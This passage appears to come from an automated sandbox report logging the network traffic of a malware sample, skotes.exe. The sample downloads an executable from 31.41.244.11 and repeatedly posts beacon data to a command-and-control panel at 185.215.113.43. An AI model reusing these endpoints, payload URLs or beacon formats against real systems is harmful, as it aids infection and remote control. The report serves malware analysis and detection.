                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:41.602520943 CET299INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:41 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 36 64 0d 0a 20 3c 63 3e 31 30 31 37 36 32 39 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 65 37 31 39 62 35 30 35 39 62 62 30 32 61 62 35 65 34 35 34 32 35 31 39 37 64 31 61 61 31 64 61 61 61 38 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 6d <c>1017629001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#<d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          33192.168.2.44993531.41.244.11806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:41.749530077 CET62OUTGET /files/unique1/random.exe HTTP/1.1
                                                                                                                                                                                                                                                          Host: 31.41.244.11
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:43.073367119 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:42 GMT
                                                                                                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                                                                                                          Content-Length: 4442112
                                                                                                                                                                                                                                                          Last-Modified: Thu, 19 Dec 2024 13:07:25 GMT
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          ETag: "67641a8d-43c800"
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e0 55 60 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 3e 44 00 00 2e 64 00 00 32 00 00 00 50 b5 00 00 10 00 00 00 50 44 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 b5 00 00 04 00 00 dc 32 44 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 90 61 00 73 00 00 00 00 80 61 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 3a b5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 39 b5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELU`g(>D.d2PPD@2D@ _asa:9 pa>(@.rsrcaN(@.idata aP(@ P8aR(@pggsbtrmPNT(@umcppckl@C@.taggant0P"C@
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:43.073390007 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:43.073406935 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:43.073654890 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:43.073673010 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:43.073689938 CET1236INData Raw: 33 19 c1 65 5d 6b 8d b4 45 45 b8 11 af bc 9f ca e9 94 3f 19 c3 05 32 07 69 a4 e2 81 50 ca f8 d8 3c 3a 9e 09 91 cd 7e 2b 65 f5 47 9e aa b2 d0 96 e3 eb 40 d9 51 4a 2b a3 b3 cf 4f 89 8e c9 ce 59 0e ad 18 f6 21 3d 7d 3c 49 11 15 e3 81 ac 3f f6 ab 4f
                                                                                                                                                                                                                                                          Data Ascii: 3e]kEE?2iP<:~+eG@QJ+OY!=}<I?OQo7w{l qssCbmK_*~Tr\gWNT_7-pn;4F)bfk%IE?sKi)<J`5nMCL1^Izp!,r!16dKn
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:43.074019909 CET896INData Raw: 75 71 bc 1e 29 4d 38 ab 63 fd 0d 97 60 52 3b e3 0b 5a ca 2d 0f 6c b2 10 61 46 34 83 29 ba 58 71 f2 1e f7 b1 92 77 47 f7 ca 75 94 b9 40 3b ff b1 02 f9 7d 81 d9 9b 6f 4b 47 ad 7a ca f4 4d b0 e2 c4 5a 5a 66 1e 8f da 17 b5 ed 3c bb ab 2e 36 87 5a 86
                                                                                                                                                                                                                                                          Data Ascii: uq)M8c`R;Z-laF4)XqwGu@;}oKGzMZZf<.6Z$>K`Ccnp6u,!cw{FsPH2Njc/5rMkUH4%^u4%kNXeX:g!UZ<Y|j/?03:r_i
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:43.074206114 CET1236INData Raw: fe 74 8d a2 79 36 43 4b 4a 08 fa 96 4c 97 13 25 9c 45 9c 2d a9 9f 6c 95 ef 49 51 36 f3 a5 bf 3c de 9c 75 02 ed 83 04 8f 9c 11 9e bc 25 5e 34 27 bc 70 3b 71 5b f1 9c 09 20 94 45 d0 e2 3d 93 00 ad 79 04 5e 8a 46 a4 a1 cf 79 b8 9e 49 99 12 b5 ca d9
                                                                                                                                                                                                                                                          Data Ascii: ty6CKJL%E-lIQ6<u%^4'p;q[ E=y^FyI9%61cjd{hym"9T\1q7U?>RvNmi@AHCybYK+"h3G{lKJ'ul_^n81+D;
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:43.074233055 CET1236INData Raw: df c5 40 29 88 ad 9f 29 f3 c2 e4 5a 2f d1 b6 43 57 1c 45 f2 84 46 44 cf a0 29 9f 82 30 cd 1a e8 ef 49 98 42 ae 17 50 6c 25 ac 1a f2 34 1d 52 14 4b 25 b7 7e af c2 3b 81 b0 5a 83 fa a8 91 e9 13 c7 7e 66 15 30 8f 78 09 59 f7 0e 01 49 4e 39 23 fc b4
                                                                                                                                                                                                                                                          Data Ascii: @))Z/CWEFD)0IBPl%4RK%~;Z~f0xYIN9#u0X\>3p^ C;</(r{=Ylul-'xVW"$4%#H^vXNqf3HdxKL4A|:*_kP"lgHG{Yz0
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:43.074250937 CET1236INData Raw: e4 db 17 4c c0 66 68 57 e1 9f 57 f4 4c 72 ef a1 47 9c 1e bb ed 00 b7 bd c2 13 c9 a6 73 58 a4 13 9f 1c 6f f6 e8 5c b1 e7 bc 22 d9 8e 65 c2 23 87 45 34 d7 d6 18 b9 fd 18 d2 48 58 2b 10 c4 e3 1e 7a b8 c4 06 59 5e 06 6c 78 81 c4 66 3c cb e9 65 c5 8b
                                                                                                                                                                                                                                                          Data Ascii: LfhWWLrGsXo\"e#E4HX+zY^lxf<ebQ+mjOsW1]6uP.=Mh$`;6]!95t)1}}}RIt(ds"~N'49Fp)fo(A~KE32)s6aMC4<fd>k#e};)])
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:43.193032980 CET1236INData Raw: 0e 5a 14 aa 02 5a 0a 20 af 9b 20 4d 62 46 60 26 39 38 d4 f1 26 d5 80 dc 15 17 62 d3 16 6d 98 5e 3d 7e 2e ad f1 df b6 23 dc b9 4a db d7 3e 55 c6 36 d1 bf 64 2b d2 de 31 1d d4 bf 9d 38 7e d7 80 f5 75 8a e4 b4 7d 25 da af 70 2b aa 89 6d 88 e2 0e 15
                                                                                                                                                                                                                                                          Data Ascii: ZZ MbF`&98&bm^=~.#J>U6d+18~u}%p+m@%>Gmx@ThJ4txEphBkpRa6Mcihv!2kc*EcXtM4yj,jH",JdZL nDQL6<nE;?


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          34192.168.2.449965185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:53.235147953 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 31
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 64 31 3d 31 30 31 37 36 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                          Data Ascii: d1=1017629001&unit=246122658369
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:54.577600002 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:54 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          35192.168.2.449973185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:56.328898907 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:57.660482883 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:21:57 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          36192.168.2.449981185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:21:59.291140079 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:00.629471064 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:00 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          37192.168.2.449988185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:02.408550024 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:03.756555080 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:03 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          38192.168.2.449996185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:05.384387970 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:06.738497972 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:06 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          39192.168.2.450004185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:08.497428894 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:09.828505993 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:09 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          40192.168.2.450013185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:11.468918085 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:12.816442966 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:12 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          41192.168.2.450021185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:14.573864937 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:15.905359030 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:15 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          42192.168.2.450028185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:17.548471928 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                                                                                                                                                                                          Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:18.888706923 CET196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:18 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          43192.168.2.450036185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:20.651894093 CET156OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 4
                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                          Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                                          Data Ascii: st=s
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:21.994335890 CET219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 13:22:21 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          Refresh: 0; url = Login.php
                                                                                                                                                                                                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 1 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          44192.168.2.450044185.215.113.43806416C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          Dec 19, 2024 14:22:23.640675068 CET308OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          Host: 185.215.113.43
                                                                                                                                                                                                                                                          Content-Length: 154
                                                                                                                                                                                                                                                          Cache-Control: no-cache
